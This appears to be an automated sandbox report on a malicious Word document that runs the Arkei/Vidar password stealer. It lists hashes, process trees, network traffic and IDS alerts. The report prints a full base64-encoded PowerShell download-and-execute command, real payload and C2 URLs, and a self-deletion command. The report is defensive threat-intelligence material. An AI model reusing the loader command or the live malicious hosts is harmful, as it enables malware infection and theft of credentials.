File name: | Info_Khawar_Khalil.doc |
Full analysis: | https://app.any.run/tasks/cf5c7bdd-8adc-4373-855d-fcf9432255c8 |
Verdict: | Malicious activity |
Threats: | Arkei is a stealer type malware capable of collecting passwords, autosaved forms, cryptocurrency wallet credentials, and files. |
Analysis date: | February 21, 2019, 10:41:31 |
OS: | Windows 8.1 Professional (build: 9600, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: wsutowiriv nxezew, Subject: xwocub szib, Author: Alison Taylor, Template: Normal, Last Saved By: Windows User, Revision Number: 5, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Thu Apr 19 19:59:00 2018, Last Saved Time/Date: Thu Feb 21 06:21:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 2, Security: 0 |
MD5: | 161793369B919C417B54125F5504D60C |
SHA1: | 1924DE027B391EB58A1792B033669662245E4E80 |
SHA256: | 77B462654A1FCA19BB188A6C657A2172A1EEC5EF012E3341A285FF0CB6801CE0 |
SSDEEP: | 768:iMZNvT1dmHItI8YCyQfn0rqTGVqXErO+xQm75PqfkbDKy6W8w:iMZhDmHIX/fn0rqKwErO+2m756nI |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 14 |
CharCountWithSpaces: | 2 |
Paragraphs: | 1 |
Lines: | 1 |
Bytes: | 22528 |
Company: | - |
CodePage: | Unicode (UTF-8) |
Security: | None |
Characters: | 2 |
Words: | - |
Pages: | 1 |
ModifyDate: | 2019:02:21 06:21:00 |
CreateDate: | 2018:04:19 18:59:00 |
TotalEditTime: | 1.0 minutes |
Software: | Microsoft Office Word |
RevisionNumber: | 5 |
LastModifiedBy: | Windows User |
Template: | Normal |
Comments: | - |
Keywords: | - |
Author: | Alison Taylor |
Subject: | xwocub szib |
Title: | wsutowiriv nxezew |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
368 | "C:\Program Files\Microsoft Office 15\Root\Office15\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Info_Khawar_Khalil.doc" /o "" | C:\Program Files\Microsoft Office 15\Root\Office15\WINWORD.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 15.0.4433.1506 | ||||
1580 | powershell -Exec Bypass -NoP -NoExit -EC SQBFAFgAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADYAMwAuADEANwAyAC4AMQA1ADIALgAyADMAMwAvAGkAcwBhAHAAaQAvAEEARwBvAHQAbAB4AE8AUwBGADEAOABaAGcAbQBBAEwASgB4AEEAQQAwAFgAdABEAFoAOABIAFkASgB1AFUASwBVAHAAdAB1AG0AdQBuAHEALQByAEUAegBDAE4ATAB1AFYAMwBHAFAAYwBBAC8AQgBiADgAbABzAG4AeAByAEwAZgBpAGEAVwBNAGsAUABqADAASQA0AGUAeABjAHgAcgBoAEEAYQAzAFUAMwAzAHkASABkAHIALwBqAEQAZgBpAHYAcABGAFMAQgBpAGYAdQBaADcAOQBzADUAdQBpAHgAVQBGAEsATQBPADAAdABuADEAeABhADIAYwBOAFIAbQBsAFIAegBmAGkATQBBAGEAMABnAHMAQgBlADgAMQBlAEcASQB0AG8AMwBaAEcAMgBRAHQALQBQAG4AVABPAHoAVABFAHUAWAA2AEsAVQBuADgASQBlAGoAWgBGAHQAZQBrAFcARwBJAHgAbABWAEoATABjAHcAawBGAFEAdgBIAEsAYwBQAHMAUQBRAE4ASgBEAGkAOABtAFMAcQBRAHEAegBZADYAVgB6AFIAWQBxAEkATgBxAFUAVgBPAGgAUwAzAFIAZABhAG8AaABFADUAbQA4AEEAZgBtAFQAdQBvADQAeQByAGEATAA5AEcAcABGADkAMgA4AFUAcwBrAFEAIgApACkA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.3.9600.17396 (winblue_r4.141007-2030) | ||||
2516 | \??\C:\Windows\system32\conhost.exe 0xffffffff | C:\Windows\system32\conhost.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Version: 6.3.9600.16384 (winblue_rtm.130821-1623) | ||||
3496 | "C:\Users\admin\AppData\Roaming\802.exe" | C:\Users\admin\AppData\Roaming\802.exe | powershell.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
860 | "C:\Windows\System32\cmd.exe" /c taskkill /im 802.exe /f & erase C:\Users\admin\AppData\Roaming\802.exe & exit | C:\Windows\System32\cmd.exe | — | 802.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.3.9600.16384 (winblue_rtm.130821-1623) | ||||
2468 | \??\C:\Windows\system32\conhost.exe 0xffffffff | C:\Windows\system32\conhost.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 6.3.9600.16384 (winblue_rtm.130821-1623) | ||||
1820 | taskkill /im 802.exe /f | C:\Windows\system32\taskkill.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 128 Version: 6.3.9600.16384 (winblue_rtm.130821-1623) |
PID | Process | Filename | Type | |
---|---|---|---|---|
368 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRC888.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1580 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\F28HTFAW7KX4PSQ4S060.temp | — | |
MD5:— | SHA256:— | |||
3496 | 802.exe | C:\ProgramData\YMVO2U6RXUPJQ187LA7N\c-shm | — | |
MD5:— | SHA256:— | |||
3496 | 802.exe | C:\ProgramData\YMVO2U6RXUPJQ187LA7N\history | — | |
MD5:— | SHA256:— | |||
368 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$fo_Khawar_Khalil.doc | pgc | |
MD5:CAFF335625898C891B01F1A67D675D86 | SHA256:0A90F0D1251F6A0FD0656790AB5A73A4FAF0D09B7124FD4A06CFE44A5DD9B459 | |||
1580 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:247E0E3BA19572C9DABBD02ED1388722 | SHA256:D39D42E8EF2E8BF5C5F2108CB3329C6B8E6CF80E88CF567B996DDB1798DB86A8 | |||
1580 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF12d26b.TMP | binary | |
MD5:247E0E3BA19572C9DABBD02ED1388722 | SHA256:D39D42E8EF2E8BF5C5F2108CB3329C6B8E6CF80E88CF567B996DDB1798DB86A8 | |||
3496 | 802.exe | C:\ProgramData\YMVO2U6RXUPJQ187LA7N\c | sqlite | |
MD5:3B2CE68A460DB7459D59397A192BE39A | SHA256:6447575B61B00DECC1CC1A2B5748126A60C83861AE50AE45E544B9418E4404E9 | |||
368 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:CAFF335625898C891B01F1A67D675D86 | SHA256:0A90F0D1251F6A0FD0656790AB5A73A4FAF0D09B7124FD4A06CFE44A5DD9B459 | |||
1580 | powershell.exe | C:\Users\admin\AppData\Roaming\802.exe | executable | |
MD5:7D408E8CC3F8AEE2FEF5ECFAA7302BDF | SHA256:20CF542664C1DBADC3D3B79BAD41FDE58DC93A48C2BBF2B0D40BC94BCB1D5785 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1580 | powershell.exe | GET | 200 | 185.120.58.196:80 | http://185.120.58.196/leag.bin | RU | executable | 520 Kb | suspicious |
1580 | powershell.exe | GET | 200 | 163.172.152.233:80 | http://163.172.152.233/isapi/AGotlxOSF18ZgmALJxAA0XtDZ8HYJuUKUptumunq-rEzCNLuV3GPcA/Bb8lsnxrLfiaWMkPj0I4excxrhAa3U33yHdr/jDfivpFSBifuZ79s5uixUFKMO0tn1xa2cNRmlRzfiMAa0gsBe81eGIto3ZG2Qt-PnTOzTEuX6KUn8IejZFtekWGIxlVJLcwkFQvHKcPsQQNJDi8mSqQqzY6VzRYqINqUVOhS3RdaohE5m8AfmTuo4yraL9GpF928UskQ | FR | text | 150 b | unknown |
3496 | 802.exe | GET | 200 | 169.239.129.33:80 | http://yourseo.ac.ug/freebl3.dll | ZA | executable | 326 Kb | malicious |
3496 | 802.exe | GET | 200 | 169.239.129.33:80 | http://yourseo.ac.ug/msvcp140.dll | ZA | executable | 429 Kb | malicious |
3496 | 802.exe | POST | — | 54.38.92.92:80 | http://ip-api.com/line/ | FR | — | — | shared |
3496 | 802.exe | GET | 200 | 169.239.129.33:80 | http://yourseo.ac.ug/vcruntime140.dll | ZA | executable | 81.8 Kb | malicious |
3496 | 802.exe | POST | 200 | 169.239.129.33:80 | http://yourseo.ac.ug/ | ZA | text | 22 b | malicious |
3496 | 802.exe | GET | 200 | 169.239.129.33:80 | http://yourseo.ac.ug/softokn3.dll | ZA | executable | 141 Kb | malicious |
3496 | 802.exe | GET | 200 | 169.239.129.33:80 | http://yourseo.ac.ug/nss3.dll | ZA | executable | 1.19 Mb | malicious |
3496 | 802.exe | POST | 200 | 169.239.129.33:80 | http://yourseo.ac.ug/285 | ZA | text | 153 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1580 | powershell.exe | 185.120.58.196:80 | — | LLC Alfa Group | RU | suspicious |
1580 | powershell.exe | 163.172.152.233:80 | — | Online S.a.s. | FR | unknown |
3496 | 802.exe | 54.38.92.92:80 | ip-api.com | OVH SAS | FR | malicious |
3496 | 802.exe | 169.239.129.33:80 | yourseo.ac.ug | Zappie Host LLC | ZA | malicious |
Domain | IP | Reputation |
---|---|---|
office15client.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
yourseo.ac.ug |
| malicious |
ip-api.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
3496 | 802.exe | A Network Trojan was detected | MALWARE [PTsecurity] Generic.PWS.Arkei Stealers Header (Vidar) |
3496 | 802.exe | Potential Corporate Privacy Violation | ET POLICY External IP Lookup ip-api.com |
3496 | 802.exe | A Network Trojan was detected | MALWARE [PTsecurity] Generic.PWS.Arkei Stealers Header (Vidar) |
Process | Message |
---|---|
WINWORD.EXE | SHIMVIEW: ShimInfo(Complete)
|
802.exe | SHIMVIEW: ShimInfo(Complete)
|